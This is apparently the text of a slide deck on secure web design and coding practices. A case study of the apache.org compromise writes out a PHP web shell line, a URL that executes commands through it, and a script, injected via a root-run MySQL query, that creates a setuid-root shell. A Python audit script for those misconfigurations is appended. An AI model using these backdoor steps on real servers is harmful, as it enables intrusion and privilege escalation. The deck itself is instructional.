Security and Web Programming/Design
cell phones
bio-facilities
Sodas, junk food, and coffee
Welcome to the No Smoking State
who are you?
where are you from?
what do you do?
Emacs or vi?
Warm Fuzzies
Secure Design and Implementation
Wordage
Security Concepts
Vetting Software
Design Strategy
Developer practices
Coding Practices
Operational Practices
Security Concepts
trust
transitive trust
principle of least privilege
enumerating badness
“best block: not be there”
-- Mr. Miyagi
“defense in depth”
threats
vulnerabilities
risks
who accepts the risk?
being paranoid
confidentiality
integrity
availability
protect what you can
detect what you can’t prevent
hammers, nails...
a security mechanism is designed to protect against a specific,
finite set of attacks.
It usually fails gloriously when modified or used for
other purposes.
don’t design your own new security protocol
the law of unintended consequences
don’t rely on the environment for protection
don’t rely on good behavior
don’t rely on things you can’t control
how apache.org got pwn3d
ftproot == wwwroot
webuser == o+w
upload php via ftp
<? passthru($cmd); ?>
upload backdoor code
compile and execute via http
http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c
voila! shell on web server
bugzilla talking to mysql
mysql running as root
mysql username/password stored in script
create table with text field
insert:
#!/bin/sh
cp /bin/sh /tmp/.rootsh
chmod 4755 /tmp/.rootsh
rm -f /root/.tcshrc
query: SELECT ... INTO ‘/root/.tcshrc’
wait for someone to “su -”
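As an added example (not from the slides), a small Python audit for the configuration conditions this story turns on: an FTP upload root that overlaps the web root, o+w permissions under it, and mysqld running as root. The directory layout and the `ps -eo user,comm` lines it inspects are constructed inside the script so it runs offline.

```python
# Added audit example (not from the slides): checks for the conditions the
# apache.org story relies on. The sample directory tree and ps output are
# constructed here so the script runs offline.
import os
import stat
import tempfile

def same_or_nested(ftproot, wwwroot):
    """True when one root is the other or lies inside it (ftproot == wwwroot)."""
    a, b = os.path.realpath(ftproot), os.path.realpath(wwwroot)
    return a == b or a.startswith(b + os.sep) or b.startswith(a + os.sep)

def world_writable(root):
    """Relative paths under root whose mode grants write to 'other'; symlinks skipped."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in [""] + filenames:            # "" means the directory itself
            path = os.path.join(dirpath, name) if name else dirpath
            mode = os.lstat(path).st_mode
            if not stat.S_ISLNK(mode) and mode & stat.S_IWOTH:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)

def daemons_running_as_root(ps_lines, names=("mysqld",)):
    """Given lines in `ps -eo user,comm` format, return listed daemons owned by root."""
    return [parts[1] for parts in (line.split() for line in ps_lines)
            if len(parts) >= 2 and parts[0] == "root" and parts[1] in names]

def demo():
    """Build a constructed layout mirroring the slide's setup and audit it."""
    base = tempfile.mkdtemp()
    www = os.path.join(base, "www")
    thatdir = os.path.join(www, "thatdir")
    os.makedirs(thatdir)
    os.chmod(www, 0o755)
    os.chmod(thatdir, 0o777)                      # webuser == o+w
    upload = os.path.join(thatdir, "upload.txt")  # what an FTP user could drop here
    open(upload, "w").close()
    os.chmod(upload, 0o644)
    ps_output = ["USER COMMAND", "root mysqld", "www httpd", "root sshd"]  # constructed
    return {
        "shared_root": same_or_nested(www, www),  # ftproot == wwwroot
        "world_writable": world_writable(www),
        "root_daemons": daemons_running_as_root(ps_output),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```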
Security Vetting
What is it supposed to do?
How does it work?
What side effects are there?
How is it deployed and maintained?
How does it fail?
What is the risk?
Can it be mitigated?
usability and security
understanding
caring
under-budget
security is an enabling task
It is especially important for expert programmers to internalize this habit, for two reasons. One is that expert programmers are disproportionately drawn from the high end of the bell curve in their working-set size; therefore they tend to systematically overestimate the amount of complexity other people can handle easily.
-- Eric S. Raymond, The Art of Unix Usability
Design Strategy
top down design
goals
requirements
design
review
what is the end result?
what problem is it trying to solve?
*not* how it is implemented
security
usability
performance
environmental
support
deployment
political
external
as simple as possible to meet the requirements
add requirements if apparent during design
be prepared to change when requirements can’t be met
for each security control
what threat is addressed?
Really?
recent examples
Developer Practices
The three virtues of a programmer are laziness, impatience, and hubris.
-- Larry Wall
Group permissions and accounts
Code Safety
Test Environment
Regression Testing
Coding Practices
bounds checking
input validation
no client-side trust
error checking
sql injection
cross-site scripting
credential handling
data mapping
logging
don’t require shell for remote execution
Operational Practices
Server accounts and permissions
handling credentials
accountability
software maintenance
documentation
testing and debugging